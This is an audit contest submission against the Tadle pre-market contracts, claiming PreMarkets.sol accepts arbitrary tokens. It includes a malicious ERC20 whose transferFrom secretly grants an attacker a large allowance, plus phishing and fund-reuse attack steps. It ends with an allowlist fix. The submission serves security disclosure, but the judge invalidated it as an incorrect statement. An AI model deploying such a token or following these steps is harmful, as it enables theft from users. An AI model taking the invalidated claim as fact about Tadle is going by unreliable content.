Tadle

DeFiFoundry
27,750 USDC
Submission Details
Severity: medium
Invalid

Arbitrary tokens can be used to execute malicious actions

Summary

Arbitrary tokens can be used when creating offers, which could allow malicious users to execute malicious actions and attempt to scam other users through the PreMarkets.sol contract.

Vulnerability Details

We trace through an example malicious token whose transferFrom also grants an approval inside the same call, which lets the malicious user pull the initially taken tokens back out again.

// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity ^0.8.13;

import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

contract MockERC20Token is ERC20 {
    // Attacker-controlled address that silently receives an allowance on every transferFrom.
    address badMan = address(190);

    constructor() ERC20("MockToken", "MT") {}

    function transferFrom(address from, address to, uint256 value) public override returns (bool) {
        // Normal ERC20 transfer: tokens move from `from` to `to` (e.g. into the TokenManager).
        super.transferFrom(from, to, value);
        // Side effect: the caller (the contract that just pulled the tokens) approves badMan
        // for a huge amount, so badMan can later pull the tokens back out of that contract.
        if (msg.sender != badMan) {
            super._approve(msg.sender, badMan, value * 1e10, true);
        }
        return true;
    }
}

An attacker, banking on potential bidders looking for points or pre-market tokens to buy against a project, can

  • set up a flimsy project within a circle and deploy a malicious token like the one above to trade on Tadle, banking on bidders' trust in Tadle, or

  • phish a real project by announcing the launch of a pre-market token at the same time as the real project, but with a different token address

  • create multiple loops of: deposit to create an offer (createOffer -> tillIn -> _transfer) -> transfer the tokens back -> deposit to create another offer -> transfer the tokens back again

  • settle bids against real users' funds, or

  • settle multiple bids with the same funds

https://github.com/Cyfrin/2024-08-tadle/blob/main/src/core/PreMarkets.sol#L39-L101
https://github.com/Cyfrin/2024-08-tadle/blob/main/src/core/TokenManager.sol#L56-L102
https://github.com/Cyfrin/2024-08-tadle/blob/main/src/utils/Rescuable.sol#L104

Impact

Phishing a real project to steal user funds, DoS, and loss of trust are likely too.

Tools Used

Manual Review

Recommendations

Whitelist offer and bid tokens; to make this easier, use roles so that multiple trusted entities can whitelist new pre-market/points tokens.
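As an added example that is not part of this submission or of the Tadle codebase: a minimal role-based token allowlist built on OpenZeppelin AccessControl, placed in front of a tillIn-style deposit. The contract name, TOKEN_LISTER_ROLE and depositForOffer are assumptions chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

import {AccessControl} from "@openzeppelin/contracts/access/AccessControl.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

/// Illustrative allowlist for offer/bid tokens (example code, not Tadle's own).
contract TokenAllowlist is AccessControl {
    using SafeERC20 for IERC20;

    // Assumed role name: holders may list or delist pre-market/points tokens.
    bytes32 public constant TOKEN_LISTER_ROLE = keccak256("TOKEN_LISTER_ROLE");

    mapping(address => bool) public isAllowedToken;

    event TokenAllowed(address indexed token, bool allowed);

    error TokenNotAllowed(address token);
    error UnexpectedReceivedAmount(uint256 expected, uint256 received);

    constructor(address admin) {
        _grantRole(DEFAULT_ADMIN_ROLE, admin);
        _grantRole(TOKEN_LISTER_ROLE, admin);
    }

    // Several trusted entities can hold TOKEN_LISTER_ROLE; the admin manages
    // membership with the inherited grantRole / revokeRole.
    function setTokenAllowed(address token, bool allowed) external onlyRole(TOKEN_LISTER_ROLE) {
        isAllowedToken[token] = allowed;
        emit TokenAllowed(token, allowed);
    }

    modifier onlyAllowedToken(address token) {
        if (!isAllowedToken[token]) revert TokenNotAllowed(token);
        _;
    }

    /// Stand-in for the tillIn-style deposit: rejects unlisted tokens and, as
    /// defence in depth, checks that the contract's balance grew by exactly `amount`.
    function depositForOffer(address token, uint256 amount) external onlyAllowedToken(token) {
        uint256 before = IERC20(token).balanceOf(address(this));
        IERC20(token).safeTransferFrom(msg.sender, address(this), amount);
        uint256 received = IERC20(token).balanceOf(address(this)) - before;
        if (received != amount) revert UnexpectedReceivedAmount(amount, received);
        // offer bookkeeping would follow here
    }
}
```

The balance check alone would not stop the token shown above, since its pull-back happens in a later transaction through the planted allowance; the allowlist is the control that actually matters here.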

Updates

Lead Judging Commences

0xnevi Lead Judge
over 1 year ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
